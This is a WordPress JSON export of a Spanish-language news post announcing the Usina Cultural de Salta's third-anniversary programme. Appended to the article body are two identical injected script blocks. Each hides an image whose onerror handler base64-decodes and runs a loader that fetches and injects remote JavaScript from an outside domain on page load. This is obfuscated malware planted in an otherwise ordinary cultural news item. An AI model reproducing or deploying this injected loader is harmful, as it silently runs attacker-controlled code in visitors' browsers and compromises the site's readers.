{"id":1875,"date":"2022-11-29T12:49:19","date_gmt":"2022-11-29T15:49:19","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1875"},"modified":"2025-08-14T00:29:05","modified_gmt":"2025-08-14T03:29:05","slug":"la-usina-cultural-de-salta-celebra-su-tercer-aniversario","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1875","title":{"rendered":"La Usina Cultural de Salta celebra su tercer aniversario"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#be0231\"><strong><em>Las actividades programadas para este 30 de noviembre. Espect\u00e1culos de m\u00fasica en vivo, artes circenses, acrobacias, la transmisi\u00f3n del partido de Argentina \u2013 Polonia son algunas de las actividades previstas para esta jornada.<\/em><\/strong><\/h4>\n\n\n\n<p>La&nbsp;<strong>Usina Cultural&nbsp;<\/strong>es el lugar que eligen semana tras semanas, los j\u00f3venes para pasar el d\u00eda y compartir entre amigos o familia presentaciones \u00fanicas. En esta oportunidad, el mi\u00e9rcoles 30 de noviembre se celebrar\u00e1 desde el mediod\u00eda y hasta las 22, el tercer aniversario de la Usina Cultural.<\/p>\n\n\n\n<p>Ram\u00f3n Vivas, director de la Usina Cultural, a modo de balance manifest\u00f3 que \u201cla pandemia signific\u00f3 un desaf\u00edo muy grande, porque este espacio en el Noroeste Argentino sigue representando una novedad, iniciamos la gesti\u00f3n teniendo en cuenta que hab\u00eda que tomar la iniciativa de convocar y potenciar el trabajo creativo de los productores, artistas y gestores en nuestra Provincia\u201d.<\/p>\n\n\n\n<p>Al respecto de la gesti\u00f3n durante estos tres a\u00f1os, se\u00f1al\u00f3&nbsp;que \u201cse trata de darle el lugar a nuestros artistas, a todos aquellos que comprenden el espectro cultural. Usina Cultural es un nombre que posee un potencial infinito, no solo se trata de las diferentes expresiones de arte, sino de fomentar la actividad creativa en la provincia, nos encontramos con una pandemia a tres meses de la inauguraci\u00f3n y fue necesario replantear nuestros objetivos\u201d.<\/p>\n\n\n\n<p>El funcionario rememora lo que implic\u00f3 la virtualidad para la comunidad que comprende el colectivo de artistas de la Usina Cultural, \u201chicimos un trabajo virtual muy fuerte principalmente porque se trata de darle un lugar fundamentalmente a los creadores salte\u00f1os y residentes, m\u00e1s all\u00e1 de la disciplina o corriente art\u00edstica a trav\u00e9s de la que se expresan\u201d.<\/p>\n\n\n\n<p>La Usina Cultural como generadora de ideas, recibe constantemente a miles de j\u00f3venes que manifiestan la Cultura a trav\u00e9s de diferentes expresiones, \u201ccreemos en el talento de todos los salte\u00f1os y creemos que es lo m\u00e1s importante, sostener la atracci\u00f3n y gesti\u00f3n plural de las ideas. En un contexto de hipercomunicaci\u00f3n, podemos reflexionar que no existe una identidad cultural \u00fanica, todos los que integramos esta comunidad estamos formados e informados de todas las cuestiones que suceden al instante y de todas las culturas art\u00edsticas que comprenden el espectro cultural salte\u00f1o\u201d, finaliza el director de la Usina Cultural.<\/p>\n\n\n\n<p>La Usina es el resultado de la obra cultural m\u00e1s importante de las \u00faltimas d\u00e9cadas, y se erige como un lugar donde se escribir\u00e1n nuevas p\u00e1ginas para la cultura, a trav\u00e9s de la expresi\u00f3n, la creatividad, la producci\u00f3n, y el encuentro de todos los salte\u00f1os.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4897-la-usina-cultural-de-salta-celebra-su-tercer-aniversario.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4897-la-usina-cultural-de-salta-celebra-su-tercer-aniversario.jpg\" alt=\"La Usina Cultural de Salta celebra su tercer aniversario\"\/><\/a><\/figure>\n\n\n\n<p><strong>Cronograma de actividades<\/strong><\/p>\n\n\n\n<p>A partir de las 12 del mediod\u00eda, dar\u00e1 inici\u00f3 una Feria Gastron\u00f3mica para todos aquellos que deseen compartir la previa del partido Argentina \u2013 Polonia, el cual ser\u00e1 transmitido a partir de las 16 &nbsp;en la pantalla gigante ubicada en la plaza de la Usina Cultural.<\/p>\n\n\n\n<p>Al finalizar el partido de la Selecci\u00f3n Argentina y los sorteos previstos en oportunidad del III\u00ba Aniversario, a las 18 &nbsp;tendr\u00e1 lugar el warm up de la DJ Lana Figueroa, Lola Bloom, Fran Resina, artes circenses a cargo de Andina Compa\u00f1\u00eda Acrob\u00e1tica, Dance Exhibici\u00f3n K-Pop, FreeStyle &nbsp;y Hip Hop.<\/p>\n\n\n\n<p>A lo largo de la jornada, se realizar\u00e1 en los espacios del Sal\u00f3n de Usos M\u00faltiples &nbsp;la \u201cExpo Tatoo\u201d que exhibir\u00e1 muestras de tatuajes de doce tatuadores y exhibiciones en vivo, como tambi\u00e9n pintacaritas en ocasi\u00f3n del partido Argentina \u2013 Polonia. &nbsp;<\/p>\n\n\n\n<p><strong>Sobre la Usina Cultural<\/strong><\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4898-la-usina-cultural-de-salta-celebra-su-tercer-aniversario.jpg\" alt=\"\" width=\"285\" height=\"186\"\/><\/figure><\/div>\n\n\n<p>La Usina Cultural es un moderno edificio que materializa ideas culturales y art\u00edsticas. Su ubicaci\u00f3n estrat\u00e9gica en Espa\u00f1a y Juramento, le permitir\u00e1 constituirse en un espacio convocante de d\u00eda y de noche, integrado a los circuitos culturales y tur\u00edsticos de la ciudad.<\/p>\n\n\n\n<p>Con una superficie cubierta recuperada de 1.157 m2, m\u00e1s una nueva de 700 m2 emplazadas en un majestuoso terreno de 8.500 m2, el lugar cuenta con: un Teatro con capacidad para aproximadamente 300 personas divididas entre Platea y Pulman; un SUM, el espacio con mayor versatilidad de la Usina, equipado para los m\u00e1s diversos usos; \u00a0Salas de variadas dimensiones, con tecnolog\u00eda y mobiliario adaptables a distintos armados; un Anfiteatro con capacidad para 300 personas ubicado en el coraz\u00f3n del predio, al aire libre y rodeado por un parque natural, ideal para eventos a puertas abiertas; una Plaza Seca y Pantalla, sector a cielo abierto con una pantalla gigante que se integra al parque y al \u00e1rea de foodtrucks, ideal para ciclos de cine, espect\u00e1culos multimedia, m\u00fasica incidental, ferias, etc.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"La Usina Cultural de Salta celebra su tercer aniversario\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/WejVys12hlk?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Las actividades programadas para este 30 de noviembre. Espect\u00e1culos de m\u00fasica en vivo, artes circenses, acrobacias, la transmisi\u00f3n del partido de Argentina \u2013 Polonia son algunas de las actividades previstas para esta jornada. La&nbsp;Usina Cultural&nbsp;es el lugar que eligen semana tras semanas, los j\u00f3venes para pasar el d\u00eda y compartir entre amigos o familia presentaciones [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1876,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-1875","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1875"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1875"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1875\/revisions"}],"predecessor-version":[{"id":7259,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1875\/revisions\/7259"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1876"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1875"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1875"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1875"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}